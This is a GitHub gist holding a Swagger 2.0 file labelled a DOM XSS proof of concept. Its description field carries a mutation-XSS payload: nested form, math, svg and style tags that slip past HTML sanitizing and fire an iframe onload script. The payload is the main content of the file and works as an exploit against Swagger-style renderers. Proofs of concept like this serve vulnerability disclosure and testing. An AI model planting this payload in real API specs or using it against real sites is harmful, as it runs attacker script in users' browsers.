Skip to content

Instantly share code, notes, and snippets.

@insightglacier
Created April 26, 2022 13:49
Show Gist options
  • Select an option

  • Save insightglacier/1e556a6e90ce512254fb31c61fde755a to your computer and use it in GitHub Desktop.

Select an option

Save insightglacier/1e556a6e90ce512254fb31c61fde755a to your computer and use it in GitHub Desktop.
swagger: '2.0'
info:
version: "0.0.1"
title: DOM XSS PoC
description: <form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><iframe onload=alert(document.domain)>">
paths:
/:
get:
responses:
200:
description: Successful response
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment